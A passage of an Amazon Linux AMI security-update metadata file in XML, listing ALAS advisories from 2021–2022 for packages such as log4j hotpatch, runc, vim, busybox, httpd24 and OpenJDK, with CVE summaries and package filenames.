arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package 
name="java-1.8.0-openjdk-debuginfo" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.312.b07-0.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1554</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1554: important priority package update for log4j-cve-2021-44228-hotpatch</title><issued date="2021-12-22 21:18:00" /><updated date="2022-04-28 05:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3100:
The Apache Log4j hotpatch package starting with log4j-cve-2021-44228-hotpatch-1.1-13 will now explicitly mimic the permissions of the JVM attempting to be updated.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3100" title="" id="CVE-2021-3100" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j-cve-2021-44228-hotpatch" version="1.1" release="13.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-cve-2021-44228-hotpatch-1.1-13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1555</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1555: medium priority package update for containerd</title><issued date="2021-12-28 23:54:00" /><updated date="2021-12-29 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15157:
A flaw was found in containerd. Credentials may be leaked during an image pull.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15157" title="" id="CVE-2020-15157" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-debuginfo" version="1.3.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.3.2-1.3.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.3.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.3.2-1.3.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.3.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.3.2-1.3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1556</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1556: important priority package update for runc</title><issued date="2021-12-28 23:55:00" /><updated date="2025-04-23 21:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-19921:
A flaw was found in runc. An attacker who controls the container image for two containers that share a volume can race volume mounts during container initialization, by adding a symlink to the rootfs that points to a directory on the volume. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2019-16884:
runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884" title="" id="CVE-2019-16884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19921" title="" id="CVE-2019-19921" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="runc" version="1.0.0" release="0.1.20200204.gitdc9208a.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-1.0.0-0.1.20200204.gitdc9208a.1.amzn1.x86_64.rpm</filename></package><package name="runc-debuginfo" version="1.0.0" release="0.1.20200204.gitdc9208a.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-debuginfo-1.0.0-0.1.20200204.gitdc9208a.1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1557</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1557: medium priority package update for vim</title><issued date="2022-01-18 20:12:00" /><updated date="2024-05-09 17:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-4193:
It was found that vim was vulnerable to an out-of-bound read flaw in getvcol(). A specially crafted file could be used to, when opened in vim, disclose some of the process's internal memory.
CVE-2021-4192:
It was found that vim was vulnerable to use-after-free flaw in win_linetabsize(). Sourcing a specially crafted file in vim could crash the vim process or possibly lead to other undefined behaviors.
CVE-2021-4187:
A flaw was found in vim. A possible use after free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution.
CVE-2021-4173:
A flaw was found in vim. A possible use after free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution.
CVE-2021-4166:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution.
CVE-2021-4136:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution.
CVE-2021-4069:
vim is vulnerable to a use-after-free.
CVE-2021-4019:
A flaw was found in vim. A possible heap-based buffer overflow vulnerability allows an attacker to input a specially crafted file, leading to a crash or code execution. The highest threat from this vulnerability is system availability.
CVE-2021-3984:
A flaw was found in vim. A possible heap-based buffer overflow allows an attacker to input a specially crafted file, leading to a crash or code execution. The highest threat from this vulnerability is confidentiality, integrity, and system availability.
CVE-2021-3974:
A flaw was found in vim. A possible use-after-free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability.
CVE-2021-3973:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability.
CVE-2021-3968:
A flaw was found in vim. A possible heap use-after-free vulnerability could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to system availability.
CVE-2021-3928:
A flaw was found in vim. A possible stack-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-3927:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-3903:
vim is vulnerable to a heap-based buffer overflow.
CVE-2020-20703:
Buffer Overflow vulnerability in VIM v.8.1.2135 allows a remote attacker to execute arbitrary code via the operand parameter.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20703" title="" id="CVE-2020-20703" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3903" title="" id="CVE-2021-3903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3927" title="" id="CVE-2021-3927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3928" title="" id="CVE-2021-3928" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3968" title="" id="CVE-2021-3968" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3973" title="" id="CVE-2021-3973" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3974" title="" id="CVE-2021-3974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3984" title="" id="CVE-2021-3984" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4019" title="" id="CVE-2021-4019" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4069" title="" id="CVE-2021-4069" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4136" title="" id="CVE-2021-4136" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4166" title="" id="CVE-2021-4166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4173" title="" id="CVE-2021-4173" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4187" title="" id="CVE-2021-4187" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4192" title="" id="CVE-2021-4192" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4193" title="" id="CVE-2021-4193" type="cve" /></references><pkglist><collection 
short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-enhanced" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.2.4006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.4006-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.4006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.4006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.4006-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.4006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.4006-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.4006-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.4006-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.2.4006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.4006-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1558</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1558: medium 
priority package update for busybox</title><issued date="2022-01-18 20:13:00" /><updated date="2023-02-17 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-42386:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern in the nvalloc function, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42385:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern in the evaluate function, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42384:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern in the handle_special function, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42379:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern in the next_input_file function, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42378:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted awk pattern, leading to possible code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2021-42376:
A flaw was found in BusyBox, where it did not properly sanitize while processing a crafted shell command, leading to a denial of service. The highest threat from this vulnerability is to system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42376" title="" id="CVE-2021-42376" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378" title="" id="CVE-2021-42378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379" title="" id="CVE-2021-42379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384" title="" id="CVE-2021-42384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385" title="" id="CVE-2021-42385" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386" title="" id="CVE-2021-42386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox" version="1.34.1" release="1.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.34.1-1.13.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-debuginfo-1.34.1-1.13.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.34.1-1.13.amzn1.x86_64.rpm</filename></package><package name="busybox" version="1.34.1" release="1.13.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.34.1-1.13.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.13.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.34.1-1.13.amzn1.i686.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.13.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-debuginfo-1.34.1-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2022-1559</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1559: important priority package update for cyrus-imapd</title><issued date="2022-01-18 20:13:00" /><updated date="2022-01-19 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33582:
A flaw was found in cyrus-imapd. A bad string hashing algorithm used in internal hash tables allows user inputs to be stored in predictable buckets. A user may cause a CPU denial of service by maliciously directing many inputs to a single bucket. The highest threat from this vulnerability is to system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33582" title="" id="CVE-2021-33582" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cyrus-imapd" version="2.4.22" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-2.4.22-1.10.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.4.22" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-debuginfo-2.4.22-1.10.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-utils" version="2.4.22" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-utils-2.4.22-1.10.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-devel" version="2.4.22" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-devel-2.4.22-1.10.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd" version="2.4.22" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-2.4.22-1.10.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-utils" version="2.4.22" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-utils-2.4.22-1.10.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.4.22" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-debuginfo-2.4.22-1.10.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-devel" version="2.4.22" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-devel-2.4.22-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1560</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1560: important priority package update for httpd24</title><issued date="2022-01-18 20:14:00" /><updated 
date="2022-01-19 22:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-44790:
A buffer overflow flaw in httpd's lua module could allow an out-of-bounds write. An attacker who is able to submit a crafted request to an httpd instance that is using the lua module may be able to cause an impact to confidentiality, integrity, and/or availability.
CVE-2021-44224:
There's a null pointer dereference and server-side request forgery flaw in httpd's mod_proxy module, when it is configured to be used as a forward proxy. A crafted packet could be sent on the adjacent network to the forward proxy that could cause a crash, or potentially SSRF via misdirected Unix Domain Socket requests. In the worst case, this could cause a denial of service or compromise to confidentiality of data.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44224" title="" id="CVE-2021-44224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44790" title="" id="CVE-2021-44790" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ssl" version="2.4.52" release="1.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.52" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.52-1.95.amzn1.noarch.rpm</filename></package><package name="httpd24-tools" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.52" release="1.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.52" release="1.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.52" release="1.95.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd24-2.4.52-1.95.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.52" release="1.95.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.52" release="1.95.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.52-1.95.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.52" release="1.95.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.52-1.95.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1561</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1561: important priority package update for java-1.8.0-openjdk</title><issued date="2022-01-18 20:14:00" /><updated date="2022-01-19 22:00:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-35603:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2021-35588:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
CVE-2021-35586:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35578:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35567:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N).
CVE-2021-35565:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35564:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2021-35561:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35559:
